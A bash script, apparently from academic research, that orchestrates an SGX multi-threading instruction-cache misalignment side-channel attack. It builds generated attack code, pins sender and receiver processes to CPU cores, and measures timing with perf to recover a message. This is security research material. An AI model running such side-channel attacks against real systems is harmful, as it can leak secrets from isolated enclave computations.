#!/bin/bash

# SGX multi-threading (MT) misalignment-based attack

# Usage: see README (step 4) in the top level 
# Authors: 
# Shuwen Deng (shuwen.deng@yale.edu)
# Bowen Huang (bowen.huang@yale.edu)
# Jakub Szefer (jakub.szefer@yale.edu)


OUTPUTFILE=$1 
AFFINITIY=$2  #now treated as affinity number
INPUT=$3 
REPEATTIME=$4 

echo "Start processing..."

set -o errexit
set -o xtrace
set -o nounset

prefix="acc"

SENDER=./fnr 
GPG=./fnr 

RUNNUM=3 
WAYNUM=0 
INCSET=5
IFMAKE=1 
Rz=10
Ro=14
Rt=16
Rh=24
LOOPNUM=1200 
INNERLOOP=1000 #2000 
dummy_number=FFFFFFF
ADDSET=3

postfix="_message.txt"
MESSAGEFILE="${OUTPUTFILE::${#OUTPUTFILE}-4}$postfix"

rm -f message.txt


echo $prefix\_$RUNNUM\_$WAYNUM\_total$INCSET\_set$IFMAKE >> $OUTPUTFILE
echo $prefix\_$RUNNUM\_$WAYNUM\_$INCSET\_set$IFMAKE >> $OUTPUTFILE
echo $prefix\_1\_$INCSET\_Rz$Rz\_Ro$Ro\_Rt$Rt\_Rh$Rh\_$INNERLOOP\_$LOOPNUM\_$ADDSET >> $OUTPUTFILE 
python2 modify_l1i_attack_v2.py $IFMAKE $INCSET 1 1 $Rz $Ro $Rt $Rh jump $ADDSET $AFFINITIY      
make clean;make


sleep 0.1

taskset -c 2 ${SENDER} sender $INPUT  & 
PROBE_PID=$!

sleep 0.6 

for (( a = 1; a <= $REPEATTIME; a = a + 1 )) 
    do
    sleep 0.1
    echo $dummy_number\_$a >> $OUTPUTFILE
    echo repeat_$a >> $OUTPUTFILE

    taskset -c $AFFINITIY perf stat -e cycles:u,instructions:u -o asse_loop.txt ./fnr receiver $INNERLOOP 0 0 $LOOPNUM
	python process_perf_asse_loop.py $OUTPUTFILE $LOOPNUM

    done
	    
sleep 0.6
kill -TERM ${PROBE_PID} 
sleep 1 

cp message.txt ${MESSAGEFILE}

